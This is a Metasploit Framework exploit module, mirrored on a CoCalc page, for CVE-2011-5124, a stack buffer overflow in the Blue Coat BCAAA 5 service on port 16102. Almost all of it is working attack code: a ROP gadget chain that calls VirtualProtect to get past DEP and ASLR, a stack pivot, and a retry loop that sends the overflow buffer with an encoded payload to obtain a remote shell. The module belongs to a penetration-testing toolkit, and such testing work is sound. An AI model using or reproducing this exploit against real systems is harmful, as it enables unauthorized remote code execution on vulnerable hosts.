CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bcaaa_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),

16
        which comes as part of the Blue Coat Authentication proxy.  Please note that by default,

17
        this exploit will attempt up to three times in order to successfully gain remote code

18
        execution (in some cases, it takes as many as five times).  This can cause your activity

19
        to look even more suspicious.  To modify the number of exploit attempts, set the

20
        ATTEMPTS option.

21
      },

22
      'License'        => MSF_LICENSE,

23
      'Author'         =>

24
        [

25
          'Paul Harrington', # Initial discovery and PoC

26
          'Travis Warren',   # MSF Module with Universal DEP/ASLR bypass

27
          'sinn3r',          # More testing / reliability, plus minor changes

28
        ],

29
      'References'     =>

30
        [

31
          [ 'CVE', '2011-5124' ],

32
          [ 'OSVDB', '72095'],

33
          [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],

34
          [ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]

35
        ],

36
      'Payload'        =>

37
        {

38
          'Space'    => 936,

39
          'BadChars' => "\x00",

40
          'StackAdjustment' => -3500,

41
        },

42
      'Platform'       => 'win',

43
      'Targets'        =>

44
        [

45
          [ 'BCAAA Version 5.4.6.1.54128', {} ],

46
        ],

47
      'Privileged'     => false,

48
      'DisclosureDate' => '2011-04-04',

49
      'DefaultTarget'  => 0))

50


51
      register_options(

52
        [

53
          Opt::RPORT(16102),

54
          OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),

55
        ])

56
  end

57


58
  def junk

59
    return rand_text(4).unpack("L")[0].to_i

60
  end

61


62
  def exploit

63


64
    rop_gadgets = [

65
      # rop chain generated with mona.py

66
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

67
      0x7c37a140,  # Make EAX readable

68
      0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)

69
      junk,        # EBP (filler)

70
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

71
      0x7c37a140,  # <- *&VirtualProtect()

72
      0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)

73
      0x7c346c0b,  # Slide, so next gadget would write to correct stack location

74
      0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)

75
      junk,        # EDI (filler)

76
      junk,        # will be patched at runtime (VP), then picked up into ESI

77
      junk,        # EBX (filler)

78
      0x7c376402,  # POP EBP # RETN (msvcr71.dll)

79
      0x7c345c30,  # ptr to 'push esp #  ret ' (from MSVCR71.dll)

80
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

81
      0xfffffdff,  # size 0x00000201 -> ebx, modify if needed

82
      0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)

83
      0x7c354901,  # POP EBX # RETN (MSVCR71.dll)

84
      0xffffffff,  # pop value into ebx

85
      0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)

86
      0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)

87
      0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)

88
      0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)

89
      0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)

90
      0x7c34b8d8,  # ROP NOP (-> edi)

91
      0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)

92
      0xffffffc0,  # value to negate, target value : 0x00000040, target: edx

93
      0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)

94
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

95
      0x90909090,  # NOPS (-> eax)

96
      0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)

97
    ].pack("V*")

98


99
    pivot = [

100
      0x7C3410C4,  # RETN (MSVCR71.dll)

101
      0x1003800C,  # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)

102
      0x4241467D,  # EBP

103
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

104
      0x7C3417D2,  # SUB EAX,EAX; RETN (MSVCR71.dll)

105
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

106
      0x7C34f6C2,  # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)

107
      junk,        # EBX

108
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

109
      0x5D02D0A0,  # SUB EBP,EAX; RETN (MSVCR70.dll)

110
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

111
      0x7C3B5080,  # XCHG EAX,ESP; RETN (MSVCP71.dll)

112
    ].pack("V*")

113


114
    attempts = datastore['ATTEMPTS']

115


116
    #Sometimes a few attempts are needed to get a shell back (3 or 5 times)

117
    attempts.times do |i|

118
      #If we have a session on the box already, then we don't continue trying

119
      break if session_created?

120
      buffer =  rand_text(8)

121
      buffer << rop_gadgets

122
      buffer << payload.encoded

123
      buffer << 'EBAB'

124
      buffer << rand_text(8)

125
      buffer << pivot

126


127
      connect

128
      print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")

129
      sock.put(buffer)

130
      handler

131
      select(nil, nil, nil, 2)

132
      disconnect

133
    end

134
  end

135
end

136


137